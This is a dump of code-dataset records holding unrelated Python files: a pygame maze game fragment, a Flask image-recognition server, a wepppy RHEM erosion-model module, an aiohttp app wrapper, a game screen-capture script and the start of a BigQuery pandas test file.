3, 200, 200))\r\n\r\n self.screen.blit(text, textRect)\r\n self.screen.blit(countdowntext, [980, 1])\r\n\r\n if self.show_question:\r\n # draw the question\r\n self.draw_question()\r\n else:\r\n # draws correct answer\r\n pass\r\n\r\n def events(self):\r\n # catch all events here\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n self.quit()\r\n elif event.type == pg.KEYDOWN:\r\n if event.key == pg.K_ESCAPE:\r\n self.quit()\r\n elif event.key == pg.K_RETURN and self.game_over is True:\r\n self.loop.state = \"menu\"\r\n", "sub_path": "mazee.py", "file_name": "mazee.py", "file_ext": "py", "file_size_in_byte": 7021, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.init", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.key.set_repeat", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "name"}, {"api_name": "json.load", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.sprite.Group", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 72, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.draw.line", "line_number": 99, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 101, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 101, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 118, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 119, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 164, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 164, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 165, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 166, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 166, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 167, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 167, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 168, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 168, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 182, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 183, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 185, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 186, "usage_type": "attribute"}, {"api_name": "pygame.K_RETURN", "line_number": 188, "usage_type": "attribute"}]} +{"seq_id": "860806", "text": "import image_recognition\nimport json\nimport base64\nimport cv2\nfrom flask import Flask\nfrom flask import request\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n@app.route('/imageRecognition', methods=['POST'])\ndef image_recog():\n print(request.json)\n \n img_base64 = request.json['image']\n img = base64.b64decode(img_base64)\n bb=image_recognition.ir.img_rec(img)\n return json.dumps({'result': bb})\n\n\n@app.route('/upload', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n f = request.files['file']\n f.save('/tmp/tmp.jpg')\n img = cv2.imread('/tmp/tmp.jpg')\n bb=image_recognition.ir.img_rec(img)\n\n return json.dumps({'result': bb})\n return 'Hello, World!'\n\n", "sub_path": "tools/image_recognition_http.py", "file_name": "image_recognition_http.py", "file_ext": "py", "file_size_in_byte": 781, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "base64.b64decode", "line_number": 19, "usage_type": "call"}, {"api_name": "image_recognition.ir.img_rec", "line_number": 20, "usage_type": "call"}, {"api_name": "image_recognition.ir", "line_number": 20, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 29, "usage_type": "call"}, {"api_name": "image_recognition.ir.img_rec", "line_number": 30, "usage_type": "call"}, {"api_name": "image_recognition.ir", "line_number": 30, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "106153694", "text": "import math\nimport csv\nimport os\nimport shutil\nimport json\nimport enum\nfrom glob import glob\n\nfrom os.path import join as _join\nfrom os.path import exists as _exists\n\nfrom copy import deepcopy\nfrom collections import Counter\n\n# non-standard\nimport jsonpickle\nimport numpy as np\nimport pandas as pd\nimport multiprocessing\n\n# wepppy\nfrom wepppy.landcover import LandcoverMap\n\nfrom wepppy.all_your_base import isfloat, isint, YearlessDate, probability_of_occurrence\n\nfrom wepppy.wepp import Element\nfrom wepppy.climates.cligen import ClimateFile\n\nfrom wepppy.watershed_abstraction import SlopeFile\n\n# wepppy submodules\nfrom wepppy.nodb.log_mixin import LogMixin\nfrom wepppy.nodb.base import NoDbBase\nfrom wepppy.nodb.mods import RangelandCover\nfrom wepppy.nodb.watershed import Watershed\nfrom wepppy.nodb.soils import Soils\nfrom wepppy.nodb.topaz import Topaz\nfrom wepppy.nodb.climate import Climate\n\nfrom wepppy.nodb.mods import Baer\nfrom wepppy.nodb.wepp import Wepp\n\n# Copyright (c) 2016-2018, University of Idaho\n# All rights reserved.\n#\n# Roger Lew (rogerlew@gmail.com)\n#\n# The project described was supported by NSF award number IIA-1301792\n# from the NSF Idaho EPSCoR Program and by the National Science Foundation.\n\n# standard library\nimport os\nimport math\nfrom enum import IntEnum\nfrom os.path import join as _join\nfrom os.path import exists as _exists\nfrom os.path import split as _split\n\nfrom subprocess import Popen, PIPE\nimport multiprocessing\nfrom concurrent.futures import ThreadPoolExecutor, as_completed, wait, FIRST_EXCEPTION\n\nfrom datetime import datetime\nimport time\n\nimport pickle\n\nfrom glob import glob\n\nimport shutil\n\n# non-standard\nimport jsonpickle\n\nimport numpy as np\n\nfrom osgeo import osr\nfrom osgeo import gdal\nfrom osgeo.gdalconst import *\n\nimport wepppy\n\n# wepppy\n\nfrom wepppy.rhem import make_parameter_file, make_hillslope_run, run_hillslope\n\nfrom wepppy.climates.cligen import ClimateFile\n\nfrom wepppy.wepp.stats import ChannelWatbal, HillslopeWatbal, ReturnPeriods, SedimentDelivery\n\nfrom .rhempost import RhemPost\n\ntry:\n NCPU = int(os.environ['WEPPPY_NCPU'])\nexcept KeyError:\n NCPU = math.floor(multiprocessing.cpu_count() * 0.5)\n if NCPU < 1:\n NCPU = 1\n\n\nclass RhemNoDbLockedException(Exception):\n pass\n\n\nclass Rhem(NoDbBase, LogMixin):\n __name__ = 'Rhem'\n\n def __init__(self, wd, cfg_fn):\n super(Rhem, self).__init__(wd, cfg_fn)\n\n self.lock()\n\n # noinspection PyBroadException\n try:\n rhem_dir = self.rhem_dir\n if not _exists(rhem_dir):\n os.mkdir(rhem_dir)\n\n config = self.config\n self.clean()\n\n self.dump_and_unlock()\n\n except Exception:\n self.unlock('-f')\n raise\n\n @property\n def rhem_dir(self):\n return _join(self.wd, 'rhem')\n\n @property\n def runs_dir(self):\n return _join(self.wd, 'rhem', 'runs')\n\n @property\n def output_dir(self):\n return _join(self.wd, 'rhem', 'output')\n\n @property\n def status_log(self):\n return os.path.abspath(_join(self.runs_dir, 'status.log'))\n\n #\n # Required for NoDbBase Subclass\n #\n\n # noinspection PyPep8Naming\n @staticmethod\n def getInstance(wd):\n with open(_join(wd, 'rhem.nodb')) as fp:\n db = jsonpickle.decode(fp.read())\n assert isinstance(db, Rhem)\n\n if _exists(_join(wd, 'READONLY')):\n return db\n\n if os.path.abspath(wd) != os.path.abspath(db.wd):\n db.wd = wd\n db.lock()\n db.dump_and_unlock()\n\n return db\n\n @property\n def _nodb(self):\n return _join(self.wd, 'rhem.nodb')\n\n @property\n def _lock(self):\n return _join(self.wd, 'rhem.nodb.lock')\n\n @property\n def has_run(self):\n return len(glob(_join(self.output_dir, '*.sum'))) > 0\n\n #\n # hillslopes\n #\n def prep_hillslopes(self):\n self.log('Prepping Hillslopes... ')\n wd = self.wd\n\n watershed = Watershed.getInstance(wd)\n\n soils = Soils.getInstance(wd)\n rangeland_covers = RangelandCover.getInstance(wd)\n climate = Climate.getInstance(self.wd)\n cli_dir = self.cli_dir\n wat_dir = self.wat_dir\n runs_dir = self.runs_dir\n out_dir = self.output_dir\n\n for topaz_id, summary in watershed.sub_iter():\n mukey = soils.domsoil_d[topaz_id]\n soil_texture = soils.soils[mukey].texture\n slp_fn = _join(wat_dir, 'hill_{}.slp'.format(topaz_id))\n slp = SlopeFile(slp_fn)\n cover = rangeland_covers.covers[topaz_id]\n\n scn_name = 'hill_{}'.format(topaz_id)\n par_fn = make_parameter_file(scn_name=scn_name,\n out_dir=runs_dir,\n soil_texture=soil_texture,\n moisture_content=0.25,\n bunchgrass_cover=cover['bunchgrass'],\n forbs_cover=cover['forbs'],\n shrubs_cover=cover['shrub'],\n sodgrass_cover=cover['sodgrass'],\n rock_cover=cover['rock'],\n basal_cover=cover['basal'],\n litter_cover=cover['litter'],\n cryptogams_cover=cover['cryptogams'],\n slope_length=slp.length,\n slope_steepness=slp.slope_scalar,\n sl=slp.slopes,\n sx=slp.distances,\n width=summary.width,\n model_version='WEPPcloud')\n\n stm_fn = _join(runs_dir, 'hill_{}.stm'.format(topaz_id))\n\n cli_summary = climate.sub_summary(topaz_id)\n cli_path = _join(cli_dir, cli_summary['cli_fn'])\n climate_file = ClimateFile(cli_path)\n climate_file.make_storm_file(stm_fn)\n\n run_fn = _join(runs_dir, 'hill_{}.run'.format(topaz_id))\n make_hillslope_run(run_fn, par_fn, stm_fn, _join(out_dir, 'hill_{}.sum'.format(topaz_id)), scn_name)\n\n self.log_done()\n\n def clean(self):\n if _exists(self.status_log):\n os.remove(self.status_log)\n\n runs_dir = self.runs_dir\n if _exists(runs_dir):\n shutil.rmtree(runs_dir)\n os.mkdir(runs_dir)\n\n output_dir = self.output_dir\n if _exists(output_dir):\n shutil.rmtree(output_dir)\n os.mkdir(output_dir)\n\n def run_hillslopes(self):\n self.log('Running Hillslopes\\n')\n watershed = Watershed.getInstance(self.wd)\n runs_dir = os.path.abspath(self.runs_dir)\n\n pool = ThreadPoolExecutor(NCPU)\n futures = []\n\n def oncomplete(rhemrun):\n status, _id, elapsed_time = rhemrun.result()\n assert status\n self.log(' {} completed run in {}s\\n'.format(_id, elapsed_time))\n\n sub_n = watershed.sub_n\n for i, (topaz_id, _) in enumerate(watershed.sub_iter()):\n self.log(' submitting topaz={} (hill {} of {})\\n'.format(topaz_id, i + 1, sub_n))\n futures.append(pool.submit(lambda p: run_hillslope(*p), (topaz_id, runs_dir)))\n futures[-1].add_done_callback(oncomplete)\n\n wait(futures, return_when=FIRST_EXCEPTION)\n\n self.log('Running RhemPost... ')\n rhempost = RhemPost.getInstance(self.wd)\n rhempost.run_post()\n\n try:\n from wepppy.weppcloud import RunStatistics\n rs = RunStatistics.getInstance('/geodata/weppcloud_runs')\n rs.increment_hillruns(watershed.config_stem, watershed.sub_n)\n except Exception:\n pass\n\n self.log_done()\n\n def report_loss(self):\n output_dir = self.output_dir\n\n raise NotImplementedError\n\n def report_return_periods(self):\n output_dir = self.output_dir\n\n raise NotImplementedError\n", "sub_path": "wepppy/nodb/mods/rhem/rhem.py", "file_name": "rhem.py", "file_ext": "py", "file_size_in_byte": 8197, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.environ", "line_number": 94, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 96, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 96, "usage_type": "call"}, {"api_name": "wepppy.nodb.base.NoDbBase", "line_number": 105, "usage_type": "name"}, {"api_name": "wepppy.nodb.log_mixin.LogMixin", "line_number": 105, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 116, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 151, "usage_type": "call"}, {"api_name": "jsonpickle.decode", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 175, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 175, "usage_type": "call"}, {"api_name": "wepppy.nodb.watershed.Watershed.getInstance", "line_number": 184, "usage_type": "call"}, {"api_name": "wepppy.nodb.watershed.Watershed", "line_number": 184, "usage_type": "name"}, {"api_name": "wepppy.nodb.soils.Soils.getInstance", "line_number": 186, "usage_type": "call"}, {"api_name": "wepppy.nodb.soils.Soils", "line_number": 186, "usage_type": "name"}, {"api_name": "wepppy.nodb.mods.RangelandCover.getInstance", "line_number": 187, "usage_type": "call"}, {"api_name": "wepppy.nodb.mods.RangelandCover", "line_number": 187, "usage_type": "name"}, {"api_name": "wepppy.nodb.climate.Climate.getInstance", "line_number": 188, "usage_type": "call"}, {"api_name": "wepppy.nodb.climate.Climate", "line_number": 188, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 197, "usage_type": "call"}, {"api_name": "wepppy.watershed_abstraction.SlopeFile", "line_number": 198, "usage_type": "call"}, {"api_name": "wepppy.rhem.make_parameter_file", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 221, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "wepppy.climates.cligen.ClimateFile", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 228, "usage_type": "call"}, {"api_name": "wepppy.rhem.make_hillslope_run", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 234, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 238, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 239, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 243, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 244, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 245, "usage_type": "call"}, {"api_name": "wepppy.nodb.watershed.Watershed.getInstance", "line_number": 249, "usage_type": "call"}, {"api_name": "wepppy.nodb.watershed.Watershed", "line_number": 249, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 250, "usage_type": "call"}, {"api_name": "os.path", "line_number": 250, "usage_type": "attribute"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 252, "usage_type": "call"}, {"api_name": "wepppy.rhem.run_hillslope", "line_number": 263, "usage_type": "call"}, {"api_name": "concurrent.futures.wait", "line_number": 266, "usage_type": "call"}, {"api_name": "concurrent.futures.FIRST_EXCEPTION", "line_number": 266, "usage_type": "name"}, {"api_name": "rhempost.RhemPost.getInstance", "line_number": 269, "usage_type": "call"}, {"api_name": "rhempost.RhemPost", "line_number": 269, "usage_type": "name"}, {"api_name": "rhempost.run_post", "line_number": 270, "usage_type": "call"}, {"api_name": "wepppy.weppcloud.RunStatistics.getInstance", "line_number": 274, "usage_type": "call"}, {"api_name": "wepppy.weppcloud.RunStatistics", "line_number": 274, "usage_type": "name"}]} +{"seq_id": "157211523", "text": "from aiohttp import web\nimport aiohttp_jinja2\nimport jinja2\n\n\nclass WebApplication(web.Application):\n def __init__(self, bot, *args, **kwargs):\n super().__init__(\n middlewares=[web.normalize_path_middleware()],\n *args, **kwargs\n )\n self.bot = bot\n\n self.add_routes([web.static(\"/static\", \"./static\")])\n aiohttp_jinja2.setup(self, loader=jinja2.FileSystemLoader('./templates'))\n\n async def start(self, *args, **kwargs):\n runner = web.AppRunner(self)\n await runner.setup()\n site = web.TCPSite(runner, *args, **kwargs)\n await site.start()\n", "sub_path": "discord_pay/web.py", "file_name": "web.py", "file_ext": "py", "file_size_in_byte": 627, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "aiohttp.web.Application", "line_number": 6, "usage_type": "attribute"}, {"api_name": "aiohttp.web", "line_number": 6, "usage_type": "name"}, {"api_name": "aiohttp.web.normalize_path_middleware", "line_number": 9, "usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 9, "usage_type": "name"}, {"api_name": "aiohttp.web.static", "line_number": 14, "usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 14, "usage_type": "name"}, {"api_name": "aiohttp_jinja2.setup", "line_number": 15, "usage_type": "call"}, {"api_name": "jinja2.FileSystemLoader", "line_number": 15, "usage_type": "call"}, {"api_name": "aiohttp.web.AppRunner", "line_number": 18, "usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 18, "usage_type": "name"}, {"api_name": "aiohttp.web.TCPSite", "line_number": 20, "usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "343065298", "text": "from skimage.metrics import structural_similarity\nfrom os.path import exists\nfrom os import listdir\nfrom os.path import isfile, join\nfrom pyautogui import *\nfrom pynput import keyboard\nfrom libs.resources_new import data\nfrom libs.resources_new import monitor_settings\n\nimport time\nimport pyautogui\n\nimport os\nimport mss\nimport mss.tools\nimport math\nimport pyperclip\n\n# myScreenshot = pyautogui.screenshot()\n# myScreenshot.save(r'file name.png')\n\nif (os.name == \"posix\"):\n from AppKit import NSScreen\n from AppKit import NSWorkspace\nelse:\n import win32gui\n from win32api import GetSystemMetrics\n\n\ncombat = False\ndebug = False\nmill = False\ndprint = False\npause = True\nwow_class = \"warrior\"\nwow_class_loaded = wow_class\n\nif os.name == \"posix\":\n screen_width = NSScreen.mainScreen().frame().size.width\n screen_height = NSScreen.mainScreen().frame().size.height\nelse:\n screen_width = GetSystemMetrics(0)\n screen_height = GetSystemMetrics(1)\n\nmonitor = str(screen_width)\n\nx = monitor_settings[monitor][\"x\"]\ny = monitor_settings[monitor][\"y\"]\nc_width = monitor_settings[monitor][\"c_width\"]\nc_height = monitor_settings[monitor][\"c_height\"]\np_offgcd_left = monitor_settings[monitor][\"p_offgcd_left\"]\np_combat_left = monitor_settings[monitor][\"p_combat_left\"]\np_interrupt_left = monitor_settings[monitor][\"p_interrupt_left\"]\np_behind_left = monitor_settings[monitor][\"p_behind_left\"]\np_clss_left = monitor_settings[monitor][\"p_clss_left\"]\n\nfile_path = os.path.abspath(__file__)\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\nif os.name == \"posix\":\n abilities_folder = dir_path + \"/images/\" + monitor\n slash = \"/\"\nelse:\n abilities_folder = dir_path + \"\\images\\\\\" + monitor\n slash = \"\\\\\"\n\nif not os.path.exists(abilities_folder):\n os.makedirs(abilities_folder)\n\n\nskills_loaded = \"warrior\"\nprint(\"Script loaded and ready.\", \"Monitor:\", screen_width, screen_height, os.name)\n\n\ndef on_press(key):\n global debug, dprint, pause, mill\n\n try:\n if key == keyboard.Key.f12:\n debug = not debug\n print(\"debug:\", debug)\n except:\n return\n\n\ndef parse_hex_color(string):\n if string.startswith(\"#\"):\n string = string[1:]\n r = int(string[0:2], 16) # red color value\n g = int(string[2:4], 16) # green color value\n b = int(string[4:6], 16) # blue color value\n return r, g, b\n\n\ndef color_similarity(base_col_val, oth_col_val):\n return math.sqrt(sum((base_col_val[i]-oth_col_val[i])**2 for i in range(3)))\n\n\ndef print_debug(no, xclass, skill, image):\n # no = '{0: <4}'.format(no)\n # xclass = '{0: <15}'.format(xclass)\n # skill = '{0: <25}'.format(skill)\n # image = '{0: <100}'.format(image)\n print(no, xclass, skill)\n\n\nclasses = {\n \"warrior\", \"druid\", \"rogue\", \"warlock\", \"mage\", \"hunter\", \"death knight\", \"priest\", \"paladin\", \"shaman\"\n}\n\ntime1 = 0.2\ntime2 = 0.1\n\ncount = 0\nnumber = 0\n\ns, t = \"\", \"\"\ncolor_distance = 10\n\n\ndef get_class(clss, color_distance):\n found_class = False\n global wow_class\n for item in data[\"colors\"]:\n for c in data[\"colors\"][item]:\n rgb = parse_hex_color(c)\n if color_similarity(rgb, clss) <= color_distance:\n found_class = True\n wow_class = item\n\n return found_class, wow_class\n\n\ndebug_folder = dir_path + \"/images/_/\"\nx = 100\ny = 100\nwith keyboard.Listener(on_press=on_press) as listener:\n\n with mss.mss() as sct:\n\n while True:\n time.sleep(1)\n\n p_main = {\"top\": 1000, \"left\": 500, \"width\": x, \"height\": y}\n # p_secondary = {\"top\": 2, \"left\": p_offgcd_left, \"width\": x, \"height\": y}\n\n if debug:\n print({\"top\": screen_width-(x/2), \"left\": screen_height-(y/2), \"width\": x, \"height\": y}, screen_width, screen_height)\n main_image = sct.grab(p_main)\n # secondary_iamge = sct.grab(p_secondary)\n mss.tools.to_png(main_image.rgb, main_image.size, output=debug_folder + \"99. main.png\".format(**p_main))\n # mss.tools.to_png(secondary_iamge.rgb, secondary_iamge.size, output=debug_folder + \"100. secondary.png\".format(**p_secondary))\n", "sub_path": "_robot/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 4159, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.name", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.name", "line_number": 38, "usage_type": "attribute"}, {"api_name": "AppKit.NSScreen.mainScreen", "line_number": 39, "usage_type": "call"}, {"api_name": "AppKit.NSScreen", "line_number": 39, "usage_type": "name"}, {"api_name": "AppKit.NSScreen.mainScreen", "line_number": 40, "usage_type": "call"}, {"api_name": "AppKit.NSScreen", "line_number": 40, "usage_type": "name"}, {"api_name": "win32api.GetSystemMetrics", "line_number": 42, "usage_type": "call"}, {"api_name": "win32api.GetSystemMetrics", "line_number": 43, "usage_type": "call"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 47, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 48, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 49, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 50, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 51, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 52, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 53, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 54, "usage_type": "name"}, {"api_name": "libs.resources_new.monitor_settings", "line_number": 55, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 58, "usage_type": "call"}, {"api_name": "os.name", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 68, "usage_type": "call"}, {"api_name": "os.name", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 79, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 96, "usage_type": "call"}, {"api_name": "libs.resources_new.data", "line_number": 124, "usage_type": "name"}, {"api_name": "libs.resources_new.data", "line_number": 125, "usage_type": "name"}, {"api_name": "pynput.keyboard.Listener", "line_number": 137, "usage_type": "call"}, {"api_name": "pynput.keyboard", "line_number": 137, "usage_type": "name"}, {"api_name": "mss.mss", "line_number": 139, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 142, "usage_type": "call"}, {"api_name": "mss.tools.to_png", "line_number": 151, "usage_type": "call"}, {"api_name": "mss.tools", "line_number": 151, "usage_type": "attribute"}]} +{"seq_id": "218549083", "text": "# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport datetime\nimport decimal\nimport functools\nimport warnings\n\ntry:\n import pandas\nexcept ImportError: # pragma: NO COVER\n pandas = None\ntry:\n import pyarrow\n import pyarrow.types\nexcept ImportError: # pragma: NO COVER\n pyarrow = None\nimport pytest\nimport pytz\n\nfrom google.cloud.bigquery import schema\n\n\n@pytest.fixture\ndef module_under_test():\n from google.cloud.bigquery import _pandas_helpers\n\n return _pandas_helpers\n\n\ndef is_none(value):\n return value is None\n\n\ndef is_datetime(type_):\n # See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#datetime-type\n return all_(\n pyarrow.types.is_timestamp,\n lambda type_: type_.unit == \"us\",\n lambda type_: type_.tz is None,\n )(type_)\n\n\ndef is_numeric(type_):\n # See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#numeric-type\n return all_(\n pyarrow.types.is_decimal,\n lambda type_: type_.precision == 38,\n lambda type_: type_.scale == 9,\n )(type_)\n\n\ndef is_timestamp(type_):\n # See: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#timestamp-type\n return all_(\n pyarrow.types.is_timestamp,\n lambda type_: type_.unit == \"us\",\n lambda type_: type_.tz == \"UTC\",\n )(type_)\n\n\ndef do_all(functions, value):\n return all((func(value) for func in functions))\n\n\ndef all_(*functions):\n return functools.partial(do_all, functions)\n\n\n@pytest.mark.skipIf(pyarrow is None, \"Requires `pyarrow`\")\ndef test_is_datetime():\n assert is_datetime(pyarrow.timestamp(\"us\", tz=None))\n assert not is_datetime(pyarrow.timestamp(\"ms\", tz=None))\n assert not is_datetime(pyarrow.timestamp(\"us\", tz=\"UTC\"))\n assert not is_datetime(pyarrow.string())\n\n\ndef test_do_all():\n assert do_all((lambda _: True, lambda _: True), None)\n assert not do_all((lambda _: True, lambda _: False), None)\n assert not do_all((lambda _: False,), None)\n\n\ndef test_all_():\n assert all_(lambda _: True, lambda _: True)(None)\n assert not all_(lambda _: True, lambda _: False)(None)\n\n\n@pytest.mark.parametrize(\n \"bq_type,bq_mode,is_correct_type\",\n [\n (\"STRING\", \"NULLABLE\", pyarrow.types.is_string),\n (\"STRING\", None, pyarrow.types.is_string),\n (\"string\", \"NULLABLE\", pyarrow.types.is_string),\n (\"StRiNg\", \"NULLABLE\", pyarrow.types.is_string),\n (\"BYTES\", \"NULLABLE\", pyarrow.types.is_binary),\n (\"INTEGER\", 